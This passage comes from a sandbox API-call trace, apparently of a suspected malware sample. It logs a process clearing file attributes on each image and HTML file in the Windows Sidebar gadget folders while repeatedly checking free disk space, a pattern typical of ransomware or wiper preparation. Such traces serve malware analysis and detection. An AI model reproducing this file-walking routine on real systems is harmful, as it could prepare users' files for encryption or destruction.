Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png", dwFileAttributes=0x80) returned 0 [0132.816] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.825] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png", dwFileAttributes=0x80) returned 0 [0132.827] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.831] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-left.png", dwFileAttributes=0x80) returned 0 [0132.833] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.838] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-middle.png", dwFileAttributes=0x80) returned 0 [0132.839] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.845] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-right.png", dwFileAttributes=0x80) returned 0 [0132.847] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.854] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_down.png", dwFileAttributes=0x80) returned 0 [0132.855] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.860] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_over.png", dwFileAttributes=0x80) returned 0 [0132.862] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.866] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_up.png", dwFileAttributes=0x80) returned 0 [0132.867] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.872] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_down.png", dwFileAttributes=0x80) returned 0 [0132.873] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.879] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_over.png", dwFileAttributes=0x80) returned 0 [0132.880] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.889] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_up.png", dwFileAttributes=0x80) returned 0 [0132.890] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.895] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\info.png", dwFileAttributes=0x80) returned 0 [0132.896] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.902] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\row_over.png", dwFileAttributes=0x80) returned 0 [0132.903] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.908] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\triangle.png", dwFileAttributes=0x80) returned 0 [0132.909] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0132.909] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0132.909] CoTaskMemFree (pv=0x4e1c10) [0132.910] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0132.952] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png", dwFileAttributes=0x80) returned 0 [0132.954] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0132.959] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png", dwFileAttributes=0x80) returned 0 [0132.960] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0132.967] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png", dwFileAttributes=0x80) returned 0 [0132.968] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0132.968] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0132.968] CoTaskMemFree (pv=0x4e1c10) [0132.969] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.993] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml", dwFileAttributes=0x80) returned 0 [0132.994] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.999] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\picturePuzzle.html", dwFileAttributes=0x80) returned 0 [0133.000] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.005] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\settings.html", dwFileAttributes=0x80) returned 0 [0133.007] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0133.007] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.007] CoTaskMemFree (pv=0x4e1c10) [0133.016] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0133.016] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.016] CoTaskMemFree (pv=0x4e1c10) [0133.016] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0133.016] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.017] CoTaskMemFree (pv=0x4e1c10) [0133.024] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.032] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png", dwFileAttributes=0x80) returned 0 [0133.033] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.040] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png", dwFileAttributes=0x80) returned 0 [0133.043] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.050] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png", dwFileAttributes=0x80) returned 0 [0133.051] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.058] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png", dwFileAttributes=0x80) returned 0 [0133.059] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.066] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png", dwFileAttributes=0x80) returned 0 [0133.067] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.074] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png", dwFileAttributes=0x80) returned 0 [0133.076] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.082] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png", dwFileAttributes=0x80) returned 0 [0133.083] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.090] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png", dwFileAttributes=0x80) returned 0 [0133.091] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.099] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\6.png", dwFileAttributes=0x80) returned 0 [0133.100] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.108] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\7.png", dwFileAttributes=0x80) returned 0 [0133.109] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.115] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\8.png", dwFileAttributes=0x80) returned 0 [0133.117] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.123] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\9.png", dwFileAttributes=0x80) returned 0 [0133.124] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.130] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\background.png", dwFileAttributes=0x80) returned 0 [0133.132] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.140] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\daisies.png", dwFileAttributes=0x80) returned 0 [0133.141] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.145] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\glow.png", dwFileAttributes=0x80) returned 0 [0133.147] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.154] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_down.png", dwFileAttributes=0x80) returned 0 [0133.155] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.172] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_over.png", dwFileAttributes=0x80) returned 0 [0133.174] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.178] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_up.png", dwFileAttributes=0x80) returned 0 [0133.180] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.184] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_bottom.png", dwFileAttributes=0x80) returned 0 [0133.185] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.190] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_divider_left.png", dwFileAttributes=0x80) returned 0 [0133.191] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.195] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_divider_right.png", dwFileAttributes=0x80) returned 0 [0133.198] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.202] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_left.png", dwFileAttributes=0x80) returned 0 [0133.203] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.208] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_right.png", dwFileAttributes=0x80) returned 0 [0133.209] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.213] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_top.png", dwFileAttributes=0x80) returned 0 [0133.214] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.219] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_bottom_left.png", dwFileAttributes=0x80) returned 0 [0133.220] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.225] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_bottom_right.png", dwFileAttributes=0x80) returned 0 [0133.226] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.231] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_top_left.png", dwFileAttributes=0x80) returned 0 [0133.232] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.236] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_top_right.png", dwFileAttributes=0x80) returned 0 [0133.238] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.242] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider.png", dwFileAttributes=0x80) returned 0 [0133.243] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.247] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider_left.png", dwFileAttributes=0x80) returned 0 [0133.249] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.253] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider_right.png", dwFileAttributes=0x80) returned 0 [0133.254] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.259] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_disabled.png", dwFileAttributes=0x80) returned 0 [0133.261] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.265] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows 